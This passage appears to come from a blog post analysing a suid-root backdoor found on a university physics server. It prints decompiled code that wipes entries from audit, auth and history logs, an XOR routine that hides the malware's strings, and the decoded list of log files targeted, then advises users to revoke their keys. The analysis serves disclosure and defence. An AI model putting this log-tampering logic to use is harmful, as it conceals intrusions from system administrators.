                machshitmitfile( & AUDIT0, __s1, (ulong) local_18, __s1);
                machshitmitfile( & AUDIT0, pcVar1, (ulong) local_18, pcVar1);
                machshitmitfile( & AUDIT1, __s1, (ulong) local_18, __s1);
                machshitmitfile( & AUDIT1, pcVar1, (ulong) local_18, pcVar1);
                machshitmitfile( & AUDIT2, __s1, (ulong) local_18, __s1);
                machshitmitfile( & AUDIT2, pcVar1, (ulong) local_18, pcVar1);
                machshitmitfile( & AUTHLOG, __s1, (ulong) local_18, __s1);
                machshitmitfile( & AUTHLOG, pcVar1, (ulong) local_18, pcVar1);
                machshitmitfile( & HISTORY, __s1, (ulong) local_18, __s1);
                retval = machshitmitfile( & HISTORY, pcVar1, (ulong) local_18, pcVar1);
                password = getpwnam(__s1);
                if (password != (passwd * ) 0x0) {
                  sprintf(uitistgleich, & UIDISPROZD, (ulong) password - > pw_uid);
                  machshitmitfile( & SECURE, uitistgleich, (ulong) local_18, uitistgleich);
                  machshitmitfile( & AUDIT0, uitistgleich, (ulong) local_18, uitistgleich);
                  machshitmitfile( & AUDIT1, uitistgleich, (ulong) local_18, uitistgleich);
                  retval = machshitmitfile( & AUDIT2, uitistgleich, (ulong) local_18, uitistgleich);
  return (ulong) retval;

But what are the file names? They sit in some memory locations pre-initialized at startup but remember, strings did not show anything interesting.
But before anything else, a function scramble() is called on them:

void scramble(char *p,int count)

  int m;
  int i;
  if (0 < count) {
    m = count * 0x8249;
    i = 0;
    while (m = (m + 0x39ef) % 0x52c7, i < count) {
      p[i] = (byte)m ^ p[i];
      m = m * 0x8249;
      i = i + 1;

As you can see, once more there is some xor-ing going on to hide the ascii filename. So, once more, I put the initial data as well as this function a in a separate C program and it produced:

603130: /var/run/utmp
60313e: /var/log/wtmp
60314c: /var/log/btmp
603160: /var/log/lastlog
603180: /var/log/messages
6031a0: /var/log/secure
6031b0: /var/log/warn
6031be: /var/log/debug
6031d0: /var/log/audit/audit.log
6031f0: /var/log/audit/audit.log.1
603210: /var/log/audit/audit.log.2
603230: /var/log/auth.log
603250: /var/log/ConsoleKit/history
603270: /var/log/authpriv
603290: /var/log/daemon.log
6032b0: /var/log/syslog

Ah, these are the log-files where you want to remove your traces.

This is how far my analysis goes. In case, you want to look at this yourself, I put everything (both binaries, the Ghidra file, my separate C program) in a tar-ball for you to download.

What all this does not show: How did the attackers get in in the first place (possibly by stealing some user's private keys on another compromised machine), how they did the privilege escalation to be able to produce a suid-root file and also, for how long they have been around. As you can see above, the files have a time stamp from over two years ago. But once you are root you can of course set this to whatever you want. But it's not clear why you wanted to back date your backdoor. I should stress that I am only a normal user on that server, so for example I don't have access to the backups to check if these files have really been around for that long.

Furthermore, the things I found are not very sophisticated. Yes, they prevented my to find out what's going on with strings by obfuscating their strings. But the rest was all so straight forward that even amateur like myself with a bit of decompiling could figure our what is going on. Plus leaving your backdoor as a suid program laying around in the file system in plain sight is not very secretive (but possibly enough to be undetected for more than two years). So unless these two files are not explicitly there to be found, the attacker will not be the most subtle one.

Which leaves the question about the attacker's motivation. Was it only for sports (bringing some thousand CPUs under control)? Was it for bitcoin mining (the most direct way to turn this advantage into material gain)? Or did they try to steal data/files etc?

If you have an account on one of the affected machines (in our case that would be anybody with a physics account at LMU as at least one affected machine had your home directory mounted) you should revoke all your secret keys that were stored there (GPG or ssh, in the latter case that means in particular delete them from .ssh/authorizedkeys and .ssh/authorizedkeys2 everywhere, not just on the affected machines. And you should consider all data on those machines compromised (whatever that might have as consequences for you). If attackers had access to your ssh private keys, they could be as well on all machines that those allow to log into without entering further passwords/passphrases/OTPs.